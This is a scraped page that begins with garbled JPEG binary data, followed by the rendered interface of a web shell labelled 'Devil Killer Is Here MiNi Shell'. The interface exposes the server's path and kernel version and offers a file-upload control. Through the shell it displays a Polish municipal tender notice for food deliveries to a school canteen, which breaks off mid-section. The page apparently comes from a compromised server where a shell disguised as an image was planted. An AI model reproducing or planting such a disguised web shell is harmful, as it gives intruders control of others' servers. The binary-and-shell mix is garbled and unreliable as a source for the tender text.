JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251202/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251202/0056877001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów spożywczych do stołówki szkolnej w 2026 r. (7 miesięcy) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wierzchosławice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660996</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wierzchosławice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(14) 631-90-30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wierzchoslawice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów spożywczych do stołówki szkolnej w 2026 r. (7 miesięcy) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22f1125d-d2a6-462b-ac39-16ff23b142ee</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00568770</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00066944/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa produktów spożywczych do stołówki szkolnej w wyznaczonym okresie 2026 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-22f1125d-d2a6-462b-ac39-16ff23b142ee <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/ oraz poczta elektroniczna (nie dotyczy składania ofert): zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e- Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/><br/>2. Wykonawca przygotowuje ofertę przy pomocy Formularza ofertowego udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.<br/><br/>3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>4. Do oferty należy dołączyć Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu oraz Formularze cenowe, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/><br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza), z tym że maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/><br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/><br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności dalej &#34;KRI&#34;, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki (pliki z danymi mogą również zostać skompresowane za pomocą programu do kompresji plików, jednakże Zamawiający musi mieć możliwość rozpakowania plików za pomocą programów określonych ww. Rozporządzeniu).<br/><br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach danych określonych w ppkt 7 (i przekazuje się jako załącznik) , lub b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/><br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: zp@wierzchoslawice.pl. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/><br/>10. Dokumenty zamówienia będą dostępne również pod adresem (po wybraniu odpowiedniego postępowania): https://bip.malopolska.pl/ugwierzchoslawice,m,452676,2025.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.20.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa ryb i mrożonek do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1.	Filet z MAKRELI w sosie pomidorowym	36	szt.<br/>2.	Sardynki w oleju	36	szt.<br/>3.	Sardynki w sosie pomidorowym	36	szt.<br/>4.	Szprotki w oleju	36	szt.<br/>5.	Szprotki w sosie pomidorowym	36	szt.<br/>6.	Morszczuk mrożony – kostka, nie mielone, 100%mięsa	75	kg<br/>7.	Łosoś mrożony – kostka, nie mielone	75	kg<br/>8.	Miruna - filet mrożony, shatterpack	600	kg<br/>9.	Paluszki rybne z fileta nie mielone	240	kg<br/>10.	Brokuł mrożony	180	kg<br/>11.	Brukselka mrożona	60	kg<br/>12.	Bukiet kwiatowy jarzyn mrożony	50	kg<br/>13.	Dynia mrożona	80	kg<br/>14.	Fasola szparagowa zielona mrożona	150	kg<br/>15.	Fasola szparagowa żółta mrożona	250	kg<br/>16.	Groszek mrożony	150	kg<br/>17.	Jagoda leśna mrożona	40	kg<br/>18.	Kalafior mrożony	300	kg<br/>19.	Malina mrożona	150	kg<br/>20.	Marchew z groszkiem mrożona	100	kg<br/>21.	Mieszanka kompotowa mrożona	1200	kg<br/>22.	Mini marchewka mrożona	100	kg<br/>23.	Szpinak rozdrobniony mrożony	30	kg<br/>24.	Śliwka węgierka bez pestek mrożona	30	kg<br/>25.	Truskawka mrożona	200	kg<br/>26.	Wiśnia drylowana mrożona	150	kg<br/>27.	Włoszczyzna mrożona	100	kg<br/>28.	Mieszanka Meksykańska	40	kg<br/>29.	Zupa jarzynowa mrożona	80	kg<br/><br/>Gotowość realizacji dostaw: w zależności od potrzeby (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</p> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa owoców i warzyw do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1.	Arbuz	300	kg<br/>2.	Awokado	100	szt.<br/>3.	Banan	1000	kg<br/>4.	Bakłażan	20	kg<br/>5.	Borówka amerykańska	5	kg<br/>6.	Brzoskwinia	50	kg<br/>7.	Brzoskwinia ufo	10	kg<br/>8.	Cytryna	100	kg<br/>9.	Granat	30	szt.<br/>10.	Gruszka	600	kg<br/>11.	Jabłka	1600	kg<br/>12.	Jabłko szara reneta	150	kg<br/>13.	Kaki 30	szt.<br/>14.	Kiwi duże	1000	szt.<br/>15.	Mandarynka	160	kg<br/>16.	Melon żółty	50	szt.<br/>17.	Morela	30	kg<br/>18.	Pomarańcza	400	kg<br/>19.	Truskawka	150	kg<br/>20.	Winogrono bezpestkowe	40	kg<br/>21.	Brokuły	50	szt.<br/>22.	Burak młody z botwiną	80	szt.<br/>23.	Buraki czerwone	350	kg<br/>24.	Cebula	500	kg<br/>25.	Cebula czerwona	30	kg<br/>26.	Cebula młoda ze szczypiorkiem	30	szt.<br/>27.	Cieciorka	20	kg<br/>28.	Cukinia	100	kg<br/>29.	Czosnek	220	szt.<br/>30.	Fasola sucha	100	kg<br/>31.	Kalarepa	120	szt.<br/>32.	Kapusta biała	150	kg<br/>33.	Kapusta biała młoda	70	szt.<br/>34.	Kapusta kiszona biała	250	kg<br/>35.	Kapusta pekińska	200	szt.<br/>36.	Kapusta włoska	100	szt.<br/>37.	Kiełki różnych warzyw	50	szt.<br/>38.	Koperek zielony	900	szt.<br/>39.	Lubczyk świeży	350	szt.<br/>40.	Marchew młoda	100	szt.<br/>41.	Marchewka	1500	kg<br/>42.	Ogórek kiszony	250	kg<br/>43.	Ogórek szklarniowy	350	kg<br/>44.	Ogórek gruntowy	50	kg<br/>45.	Papryka czerwona	200	kg<br/>46.	Papryka zielona	5	kg<br/>47.	Papryka żółta	200	kg<br/>48.	Pieczarki świeże	200	kg<br/>49.	Pietruszka korzeń	550	kg<br/>50.	Pietruszka młoda z nacią	50	szt.<br/>51.	Pietruszka natka	700	szt.<br/>52.	Pomidory koktajlowe różne odmiany	70	kg<br/>53.	Pomidory różne odmiany	200	kg<br/>54.	Pory	400	szt.<br/>55.	Rzodkiewka	170	szt.<br/>56.	Sałata zielona (różne odmiany)	250	szt.<br/>57.	Sałata – mix 180g	150	op.<br/>58.	Sałata – rukola 100g	150	op.<br/>59.	Sałata – roszponka 100g	150	op.<br/>60.	Szpinak świeży 100g	100	op.<br/>61.	Sałata – cykoria (zielona i czerwona/ 2szt. opak.)	50	op.<br/>62.	Sałata rzymska (2szt. w opak.)	50	op.<br/>63.	Seler korzeniowy	400	kg<br/>64.	Seler młody z liśćmi	70	szt.<br/>65.	Seler naciowy	100	szt.<br/>66.	Soczewica czerwona i zielona	100	kg<br/>67.	Susz z buraka czerwonego	300	szt.<br/>68.	Szczypiorek	350	szt.<br/>69.	Ziemniaki młode	2000	kg<br/>70.	Ziemniaki	6000	kg<br/>71.	Zioła świeże	100	szt.<br/>72.	Zioła świeże - mięta (IV-X)	10	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03222000-3 - Owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">15331000-7 - Warzywa przetworzone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa artykułów mleczarskich do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1.	Jogurt grecki 9% 400g	30	szt.<br/>2.	Jogurt naturalny 2% 400g	200	szt.<br/>3.	Jogurt naturalny 180g (zwykły i b/laktozy)	100	szt.<br/>4.	Jogurt naturalny wiadro 5kg	350	szt.<br/>5.	Jogurt owocowy 150g (z laktozą i bez laktozy)	1000	szt.<br/>6.	Jogurt pitny 150g (typu actimel, zwykły i b/laktozy) 1200	szt.<br/>7.	Jogurt pitny 250g bez laktozy	50	szt.<br/>8.	Kefir 1l	100	szt.<br/>9.	Kefir 200g	280	szt.<br/>10.	Masło	3000	szt.<br/>11.	Mleko bez laktozy 150	szt.<br/>12.	Maślanka 1l	150	szt.<br/>13.	Mleko UHT 2%	4500	szt.<br/>14.	Parmezan 200g	200	szt.<br/>15.	Ser Edamski	50	kg<br/>16.	Ser Feta	100	szt.<br/>17.	Ser Gouda	80	kg<br/>18.	Ser Gouda bez laktozy 150g	30	szt.<br/>19.	Ser na sernik wiaderko 1kg	350	szt.<br/>20.	Ser topiony	200	szt.<br/>21.	Serek homogenizowany 140g	1000	szt.<br/>22.	Serek maskarpone	100	szt.<br/>23.	Serek mozzarella kulka	300	szt.<br/>24.	Ser mozzarella mini 230g	100	szt.<br/>25.	Serek wiejski 580g	100	szt.<br/>26.	Serek wiejski 200g bez laktozy	10	szt.<br/>27.	Skyr naturalny i smakowy bez laktozy 150g	50	szt.<br/>28.	Skyr naturalny i smakowy 150g	1000 szt.<br/>29.	Śmietana 18% 1300	szt.<br/>30.	Śmietana 18% bez laktozy	20	szt.<br/>31.	Śmietana 12%	100	szt.<br/>32.	Śmietana 12% bez laktozy	20	szt.<br/>33.	Śmietana 30%	200	l<br/>34.	Śmietana 36%	80	l<br/>35.	Śmietana 12% słodka	30	l<br/>36.	Śmietana 18%słodka	100	l<br/>37.	Twaróg półtłusty bez laktozy 230g	50	szt.<br/>38.	Twaróg półtłusty 220	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15510000-6 - Mleko i śmietana</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15551000-5 - Jogurt i pozostałe przefermentowane przetwory mleczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania 